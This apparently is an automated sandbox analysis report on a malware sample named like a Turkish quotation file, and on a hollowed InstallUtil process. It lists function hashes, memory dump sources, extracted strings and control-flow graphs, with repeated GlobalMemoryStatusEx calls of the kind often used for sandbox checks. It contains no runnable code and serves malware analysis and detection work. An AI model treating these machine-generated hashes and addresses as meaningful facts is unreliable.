                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e1f52ecaabd206d36bc6039a83927cfe4019dae8ae1f653d25b7d2ad94c8257f
                                                          • Instruction ID: 65c582b84fd978ae4fb04ac194d39af125fc08a2a7bfdb4d7a1365519ad014ce
                                                          • Opcode Fuzzy Hash: e1f52ecaabd206d36bc6039a83927cfe4019dae8ae1f653d25b7d2ad94c8257f
                                                          • Instruction Fuzzy Hash: 1141D0B5D052589FCB00CFAAD484AEEFBF4BF49310F14946AE415B7240C738AA49CFA4
                                                          Function 05960580 Relevance: .1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ded31553a53c1b175e508819cf24cc594aa22cde8763b8a06a0292c1ad2fe6b3
                                                          • Instruction ID: 3c318d1b862db812f2bdaf4b49f07f39acf47ae64052a00ba57747d9b191c1d8
                                                          • Opcode Fuzzy Hash: ded31553a53c1b175e508819cf24cc594aa22cde8763b8a06a0292c1ad2fe6b3
                                                          • Instruction Fuzzy Hash: 5A41D0B5C052589FCB00CFAAD484AEEFBF4BF49310F14946AE415B7240C738AA49CFA4
                                                          Function 0598C319 Relevance: .1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 27efadf0725ca3cb0c7278829524766f8efcda64d1db1603241bb5cdf45feb99
                                                          • Instruction ID: 78090fbe01f8155a0819d0660c94491d59d7bd6fcbf5c358604f6e24f58d9ee7
                                                          • Opcode Fuzzy Hash: 27efadf0725ca3cb0c7278829524766f8efcda64d1db1603241bb5cdf45feb99
                                                          • Instruction Fuzzy Hash: 0021DCB5D142189FCB14DFA9D980AEEFBF5FB49310F10902AE809B7250CB35A945CFA4
                                                          Function 0598C320 Relevance: .1, Instructions: 66COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a139c8008428f34171c56a881144e98c369bd3c6a180ae346599817b9a19549
                                                          • Instruction ID: 9597baf96af39059dcc917978b86008d2cf14a76d9e056e73557a1948b5eb18b
                                                          • Opcode Fuzzy Hash: 5a139c8008428f34171c56a881144e98c369bd3c6a180ae346599817b9a19549
                                                          • Instruction Fuzzy Hash: C021BCB5D142189BCB14DFA9D980AEEFBF5FB49310F10901AE809B7210C735A945CFA5
                                                          Function 05989F58 Relevance: .1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0e7ed521c5b2ad5d03b811216235ca9620952e9302a7d1babf147b7d1346a13d
                                                          • Instruction ID: 84e75be1faf299849d69c731cc15772df0c3d11f00d17d7c3b2d6b064f6ae68c
                                                          • Opcode Fuzzy Hash: 0e7ed521c5b2ad5d03b811216235ca9620952e9302a7d1babf147b7d1346a13d
                                                          • Instruction Fuzzy Hash: 222115B1D056188BEB28CF9BC8447EEFAF7AFC9300F14C06AD408AB254DB75494A8F51
                                                          Function 05989F68 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a5a70bb2863b60bafbaaa2dc605118d485538146079a3ea4c517b51c027ac788
                                                          • Instruction ID: 6ddd50b36a184a65e7aefe0abbbd8746d49371135cb529847646888de1595834
                                                          • Opcode Fuzzy Hash: a5a70bb2863b60bafbaaa2dc605118d485538146079a3ea4c517b51c027ac788
                                                          • Instruction Fuzzy Hash: B721B4B1E056188BEB18CF9BD8447EEFBF7AFC9310F14C06AD409AA254DB7509458F51
                                                          Function 05A0EB58 Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232473759.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5a00000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c60b8fad41b1236cb5e3b47ad146caf7178279f8587cf9a4b5e9e7147a08e5b8
                                                          • Instruction ID: 70d9fa47b9a53f754387ab5a6b4ff76de57d6df1fa74b98940473ca6bb7467a5
                                                          • Opcode Fuzzy Hash: c60b8fad41b1236cb5e3b47ad146caf7178279f8587cf9a4b5e9e7147a08e5b8
                                                          • Instruction Fuzzy Hash: 3F21B971D146688BDB28CF5B9D046DEBBF7AFC9300F04D4A9D809AA268DB714985DE40
                                                          Function 05C7003B Relevance: .1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2665735e440d747563905b8c4a4d4d171ef06ede69f21ce2cc0fa9b412c7e4ad
                                                          • Instruction ID: 38c1395caa1aa1a18c21e06b1e72eb2f99a531954e6905ca750258bac3ea5189
                                                          • Opcode Fuzzy Hash: 2665735e440d747563905b8c4a4d4d171ef06ede69f21ce2cc0fa9b412c7e4ad
                                                          • Instruction Fuzzy Hash: E5219A71D046198BEB68CF2B8C5879ABAF7AFC4310F04C5EA940CA6255EB740A858F55
                                                          Function 05960697 Relevance: .1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 02a520f0abf3a8c18fbaa739af0c913d2cfe58b58c8abb29c1718d58e2e91e84
                                                          • Instruction ID: 658211024d952ebc07b777a903d662afbb6af448b2e0608ca0f70b5a4af432d7
                                                          • Opcode Fuzzy Hash: 02a520f0abf3a8c18fbaa739af0c913d2cfe58b58c8abb29c1718d58e2e91e84
                                                          • Instruction Fuzzy Hash: D7118876D052189FCB00DFA5E8887EDBBF1EB49325F185066E804B3251C738AA59CB68
                                                          Function 05C89770 Relevance: 10.1, Strings: 8, Instructions: 149COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %$(o]q$(o]q$(o]q$*$-$2$\s]q
                                                          • API String ID: 0-2751159437
                                                          • Opcode ID: 3111656a76191850a9e9b864dbffa63fa298b0a4e5bb4650cbb19b903a7ec0ab
                                                          • Instruction ID: e3f98012525a040f7d4ad08242f417c02fb3162933c93581c0ac96b387febae6
                                                          • Opcode Fuzzy Hash: 3111656a76191850a9e9b864dbffa63fa298b0a4e5bb4650cbb19b903a7ec0ab
                                                          • Instruction Fuzzy Hash: F561E374D0422CCFDB65DF69C848BAEBBF2BF49305F1089AAD40AA7254DB705A84CF51
                                                          Function 05939320 Relevance: 7.7, Strings: 6, Instructions: 153COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$4']q$4']q$4']q$4']q$paq
                                                          • API String ID: 0-463314800
                                                          • Opcode ID: ec89f0f07a52d5e1231c7a25b58ae7a60acacea77601ea687f6eec49c1d80ef1
                                                          • Instruction ID: cc5a6c039d45eba6d91ce925c7f7318d18a631c1a8088917fb8904d71eab5f4e
                                                          • Opcode Fuzzy Hash: ec89f0f07a52d5e1231c7a25b58ae7a60acacea77601ea687f6eec49c1d80ef1
                                                          • Instruction Fuzzy Hash: 4F518570A402058FD758DF69995076FBAEBFFC8300F148928D44597399DF78AD06C7A1

                                                          Execution Graph

                                                          Execution Coverage:11.1%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:27
                                                          Total number of Limit Nodes:6
                                                          execution_graph 28564 2420848 28566 242084e 28564->28566 28565 242091b 28566->28565 28569 2421452 28566->28569 28575 2421340 28566->28575 28571 2421356 28569->28571 28572 242145b 28569->28572 28570 2421448 28570->28566 28571->28570 28574 2421452 4 API calls 28571->28574 28581 2427059 28571->28581 28572->28566 28574->28571 28576 2421308 28575->28576 28578 242134b 28575->28578 28576->28566 28577 2421448 28577->28566 28578->28577 28579 2427059 4 API calls 28578->28579 28580 2421452 4 API calls 28578->28580 28579->28578 28580->28578 28583 2427063 28581->28583 28582 2427119 28582->28571 28583->28582 28586 5c0ce88 28583->28586 28591 5c0ce78 28583->28591 28587 5c0ce9d 28586->28587 28588 5c0d0b2 28587->28588 28589 5c0d4d0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28587->28589 28590 5c0d4e0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28587->28590 28588->28582 28589->28587 28590->28587 28592 5c0ce88 28591->28592 28593 5c0d0b2 28592->28593 28594 5c0d4d0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28592->28594 28595 5c0d4e0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28592->28595 28593->28582 28594->28592 28595->28592

                                                          Executed Functions

                                                          Function 02429C70 Relevance: 3.0, Instructions: 3020COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9fc35d0326d444678a485320cd1f1dee2a29fb46af395ed351c9e046d9bf1d74
                                                          • Instruction ID: a5ce6258acfa37d07ac2b8f02fcda3dc717e6c598da7d2ef3f4f9dce38849f61
                                                          • Opcode Fuzzy Hash: 9fc35d0326d444678a485320cd1f1dee2a29fb46af395ed351c9e046d9bf1d74
                                                          • Instruction Fuzzy Hash: F6630D31D10B198ACB11EF69C8846ADF7B1FF99300F55C69AE45877221EB70AAD4CF81
                                                          Function 0242CF28 Relevance: 2.3, Instructions: 2293COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8bdc93d21d3eb5f3c7c86967b3c59e36fc0b6381620fd25e42841a7aa18dbc51
                                                          • Instruction ID: 9a384f08cb734c8256939543471647e5ae6dfa485c9b8da425f896481895fb57
                                                          • Opcode Fuzzy Hash: 8bdc93d21d3eb5f3c7c86967b3c59e36fc0b6381620fd25e42841a7aa18dbc51
                                                          • Instruction Fuzzy Hash: 27332F31D107198ECB11EF69C8846AEF7B1FF99300F55C79AD448A7221EB70AAC5CB81
                                                          Function 02429C68 Relevance: 2.0, Instructions: 2007COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a9fc64b870ee8500300a6ba5f691b07adbb8a41d5123dd0cd1395866de58f76a
                                                          • Instruction ID: 563a3b55b9672bbf9111a0e5a55c91b6d4d4aa87d7dc23eb963ff773bab77b9d
                                                          • Opcode Fuzzy Hash: a9fc64b870ee8500300a6ba5f691b07adbb8a41d5123dd0cd1395866de58f76a
                                                          • Instruction Fuzzy Hash: 3823EA31D10B1A8ADB11EF69C8506A9F7B1FF99300F51D79AE44877221EB70AAD4CF81
                                                          Function 02423E48 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3433 2423e48-2423eae 3435 2423eb0-2423ebb 3433->3435 3436 2423ef8-2423efa 3433->3436 3435->3436 3437 2423ebd-2423ec9 3435->3437 3438 2423efc-2423f54 3436->3438 3439 2423ecb-2423ed5 3437->3439 3440 2423eec-2423ef6 3437->3440 3447 2423f56-2423f61 3438->3447 3448 2423f9e-2423fa0 3438->3448 3441 2423ed7 3439->3441 3442 2423ed9-2423ee8 3439->3442 3440->3438 3441->3442 3442->3442 3444 2423eea 3442->3444 3444->3440 3447->3448 3449 2423f63-2423f6f 3447->3449 3450 2423fa2-2423fba 3448->3450 3451 2423f92-2423f9c 3449->3451 3452 2423f71-2423f7b 3449->3452 3457 2424004-2424006 3450->3457 3458 2423fbc-2423fc7 3450->3458 3451->3450 3453 2423f7f-2423f8e 3452->3453 3454 2423f7d 3452->3454 3453->3453 3456 2423f90 3453->3456 3454->3453 3456->3451 3459 2424008-2424056 3457->3459 3458->3457 3460 2423fc9-2423fd5 3458->3460 3468 242405c-242406a 3459->3468 3461 2423fd7-2423fe1 3460->3461 3462 2423ff8-2424002 3460->3462 3464 2423fe3 3461->3464 3465 2423fe5-2423ff4 3461->3465 3462->3459 3464->3465 3465->3465 3466 2423ff6 3465->3466 3466->3462 3469 2424073-24240d3 3468->3469 3470 242406c-2424072 3468->3470 3477 24240e3-24240e7 3469->3477 3478 24240d5-24240d9 3469->3478 3470->3469 3479 24240f7-24240fb 3477->3479 3480 24240e9-24240ed 3477->3480 3478->3477 3481 24240db 3478->3481 3483 242410b-242410f 3479->3483 3484 24240fd-2424101 3479->3484 3480->3479 3482 24240ef-24240f2 call 2420ab0 3480->3482 3481->3477 3482->3479 3487 2424111-2424115 3483->3487 3488 242411f-2424123 3483->3488 3484->3483 3486 2424103-2424106 call 2420ab0 3484->3486 3486->3483 3487->3488 3490 2424117-242411a call 2420ab0 3487->3490 3491 2424133-2424137 3488->3491 3492 2424125-2424129 3488->3492 3490->3488 3493 2424147 3491->3493 3494 2424139-242413d 3491->3494 3492->3491 3496 242412b 3492->3496 3498 2424148 3493->3498 3494->3493 3497 242413f 3494->3497 3496->3491 3497->3493 3498->3498
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: \V_l
                                                          • API String ID: 0-2978566636
                                                          • Opcode ID: 5ca3853370ceb9e55861ba7e28ee5cd479253bacac7ea5bb9bec0f8c4ab89a6a
                                                          • Instruction ID: ae9c2e1856a8ffb987ed7e690016613dda21c913fbfec8a5e65104b142fce875
                                                          • Opcode Fuzzy Hash: 5ca3853370ceb9e55861ba7e28ee5cd479253bacac7ea5bb9bec0f8c4ab89a6a
                                                          • Instruction Fuzzy Hash: 4A915F70E002199FDF14CFAAC98579EBBF2EF88308F54812AE415A7354EB749889CF45
                                                          Function 024293F8 Relevance: .6, Instructions: 611COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bc01e8386c31063b3b4247de08fd743f4ce70e91a82802542041d9931622a802
                                                          • Instruction ID: bc3a8b67699a51be62f3a93d98db8cea3ace702e731cee6c4d8eb166af0963ed
                                                          • Opcode Fuzzy Hash: bc01e8386c31063b3b4247de08fd743f4ce70e91a82802542041d9931622a802
                                                          • Instruction Fuzzy Hash: 55327C35A002158FDB14DF69D584BAEBBB2FF88310F64856AE909DB395DB30DC49CB90
                                                          Function 02424A60 Relevance: .3, Instructions: 266COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b6c49a2848840f78fc573ad9f6e65560dbf15d43c8a7ecf04b3c70fefdae57a3
                                                          • Instruction ID: 096792c71e411a5073c321cbf235bdcbba059a5d09ff5bda10b769c179fdf704
                                                          • Opcode Fuzzy Hash: b6c49a2848840f78fc573ad9f6e65560dbf15d43c8a7ecf04b3c70fefdae57a3
                                                          • Instruction Fuzzy Hash: 58B15E70E00219CFDB14CFAAD98179EBBF2EF88314F54852AD415E7354EB749889CB91
                                                          Function 02426EA1 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2242 2426ea1-2426f0a call 2426c08 2251 2426f26-2426f55 2242->2251 2252 2426f0c-2426f25 call 2426724 2242->2252 2256 2426f57-2426f5a 2251->2256 2258 2426f5c-2426f70 2256->2258 2259 2426f8d-2426f90 2256->2259 2267 2426f72-2426f74 2258->2267 2268 2426f76 2258->2268 2260 2426f92-2426f99 2259->2260 2261 2426fa4-2426fa7 2259->2261 2263 2427168-242716f 2260->2263 2264 2426f9f 2260->2264 2265 2426fe3-2426fe6 2261->2265 2266 2426fa9-2426fde 2261->2266 2264->2261 2269 2426ff6-2426ff8 2265->2269 2270 2426fe8 call 2427988 2265->2270 2266->2265 2273 2426f79-2426f88 2267->2273 2268->2273 2271 2426ffa 2269->2271 2272 2426fff-2427002 2269->2272 2275 2426fee-2426ff1 2270->2275 2271->2272 2272->2256 2274 2427008-2427017 2272->2274 2273->2259 2278 2427041-2427057 2274->2278 2279 2427019-242701c 2274->2279 2275->2269 2278->2263 2281 2427024-242703f 2279->2281 2281->2278 2281->2279
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LR]q$LR]q
                                                          • API String ID: 0-3917262905
                                                          • Opcode ID: 450a69cea54f937ee0d1dc77aa2e2d9cca779d14693ff58cfda1ffa2642b5bd8
                                                          • Instruction ID: 281d4855836474fadb77691500e5144e60672b64e3edae9bfb9fd22c4810e5a5
                                                          • Opcode Fuzzy Hash: 450a69cea54f937ee0d1dc77aa2e2d9cca779d14693ff58cfda1ffa2642b5bd8
                                                          • Instruction Fuzzy Hash: BB51B370E002199FDF25DF6AC4507AEBBB6EF85300F52846AE406EB341EB759C4ACB41
                                                          Function 05C0E0A0 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3400 5c0e0a0-5c0e0ab 3401 5c0e0d5-5c0e0e8 3400->3401 3402 5c0e0ad-5c0e0d4 call 5c0d4c0 3400->3402 3406 5c0e0eb-5c0e0f4 call 5c0d808 3401->3406 3409 5c0e0f6-5c0e0f9 3406->3409 3410 5c0e0fa-5c0e138 3406->3410 3410->3406 3415 5c0e13a-5c0e159 3410->3415 3417 5c0e15b-5c0e15e 3415->3417 3418 5c0e15f-5c0e1ec GlobalMemoryStatusEx 3415->3418 3422 5c0e1f5-5c0e21d 3418->3422 3423 5c0e1ee-5c0e1f4 3418->3423 3423->3422
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2458107054.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5c00000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4bafde23f56d8f07d6d1bc87ef93516e98564a137b781621077ffe72bf21c97f
                                                          • Instruction ID: 732d98d3e8299e1d693a6039ea976aa1022041ebfe8c5f662a101caec26abe3d
                                                          • Opcode Fuzzy Hash: 4bafde23f56d8f07d6d1bc87ef93516e98564a137b781621077ffe72bf21c97f
                                                          • Instruction Fuzzy Hash: 53412272E003598FCB00DFA9D8443AEBBF5AF89310F15892AD409AB381DB749981CBD0
                                                          Function 05C0D808 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3426 5c0d808-5c0e1ec GlobalMemoryStatusEx 3429 5c0e1f5-5c0e21d 3426->3429 3430 5c0e1ee-5c0e1f4 3426->3430 3430->3429
                                                          APIs
                                                          • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05C0E0F2), ref: 05C0E1DF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2458107054.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5c00000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemoryStatus
                                                          • String ID:
                                                          • API String ID: 1890195054-0
                                                          • Opcode ID: fdb41c8ccff97d3ce4fb35a2900387feb1f4f0a2e5dedfedbdd91ea08a1d28f8
                                                          • Instruction ID: 98bd716b6376423c4850c37edab88225ae3c1aab73de40a0afeee3fd3b77b256
                                                          • Opcode Fuzzy Hash: fdb41c8ccff97d3ce4fb35a2900387feb1f4f0a2e5dedfedbdd91ea08a1d28f8
                                                          • Instruction Fuzzy Hash: C21103B1D006599BCB10DF9AC4446AEFBF8EF48310F14856AE818A7241D778AA44CFE5
                                                          Function 02423E3C Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3499 2423e3c-2423eae 3501 2423eb0-2423ebb 3499->3501 3502 2423ef8-2423efa 3499->3502 3501->3502 3503 2423ebd-2423ec9 3501->3503 3504 2423efc-2423f54 3502->3504 3505 2423ecb-2423ed5 3503->3505 3506 2423eec-2423ef6 3503->3506 3513 2423f56-2423f61 3504->3513 3514 2423f9e-2423fa0 3504->3514 3507 2423ed7 3505->3507 3508 2423ed9-2423ee8 3505->3508 3506->3504 3507->3508 3508->3508 3510 2423eea 3508->3510 3510->3506 3513->3514 3515 2423f63-2423f6f 3513->3515 3516 2423fa2-2423fba 3514->3516 3517 2423f92-2423f9c 3515->3517 3518 2423f71-2423f7b 3515->3518 3523 2424004-2424006 3516->3523 3524 2423fbc-2423fc7 3516->3524 3517->3516 3519 2423f7f-2423f8e 3518->3519 3520 2423f7d 3518->3520 3519->3519 3522 2423f90 3519->3522 3520->3519 3522->3517 3525 2424008-242401a 3523->3525 3524->3523 3526 2423fc9-2423fd5 3524->3526 3533 2424021-2424056 3525->3533 3527 2423fd7-2423fe1 3526->3527 3528 2423ff8-2424002 3526->3528 3530 2423fe3 3527->3530 3531 2423fe5-2423ff4 3527->3531 3528->3525 3530->3531 3531->3531 3532 2423ff6 3531->3532 3532->3528 3534 242405c-242406a 3533->3534 3535 2424073-24240d3 3534->3535 3536 242406c-2424072 3534->3536 3543 24240e3-24240e7 3535->3543 3544 24240d5-24240d9 3535->3544 3536->3535 3545 24240f7-24240fb 3543->3545 3546 24240e9-24240ed 3543->3546 3544->3543 3547 24240db 3544->3547 3549 242410b-242410f 3545->3549 3550 24240fd-2424101 3545->3550 3546->3545 3548 24240ef-24240f2 call 2420ab0 3546->3548 3547->3543 3548->3545 3553 2424111-2424115 3549->3553 3554 242411f-2424123 3549->3554 3550->3549 3552 2424103-2424106 call 2420ab0 3550->3552 3552->3549 3553->3554 3556 2424117-242411a call 2420ab0 3553->3556 3557 2424133-2424137 3554->3557 3558 2424125-2424129 3554->3558 3556->3554 3559 2424147 3557->3559 3560 2424139-242413d 3557->3560 3558->3557 3562 242412b 3558->3562 3564 2424148 3559->3564 3560->3559 3563 242413f 3560->3563 3562->3557 3563->3559 3564->3564
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: \V_l
                                                          • API String ID: 0-2978566636
                                                          • Opcode ID: 67cd4d6f9aa120443ae917e9002a6a73c62edfe02df49ec347e6316dffdab8d6
                                                          • Instruction ID: fb750fad62af220c85bb31fd1c758d0e26dc94e4c0ecad83c77d3ca6c801ce49
                                                          • Opcode Fuzzy Hash: 67cd4d6f9aa120443ae917e9002a6a73c62edfe02df49ec347e6316dffdab8d6
                                                          • Instruction Fuzzy Hash: 9E914D70E00229DFDB10CFAAD98579EBBF1EF48308F54812AE419A7394DB749889CF55
                                                          Function 0242F48D Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH]q
                                                          • API String ID: 0-3168235125
                                                          • Opcode ID: c5a6ac52bff65ec4d544c9aa29baa44d2a90e073173a1e1f5c5cbb40d1293599
                                                          • Instruction ID: c7084d480e97565080146c088e557951c856460d7e34e6e03a8c81d67cb8c55f
                                                          • Opcode Fuzzy Hash: c5a6ac52bff65ec4d544c9aa29baa44d2a90e073173a1e1f5c5cbb40d1293599
                                                          • Instruction Fuzzy Hash: 0231D130B002158FDB29AF74D95066E3BF6AF89204F944579D006DB356DF78CD8AC790
                                                          Function 0242F4A0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH]q
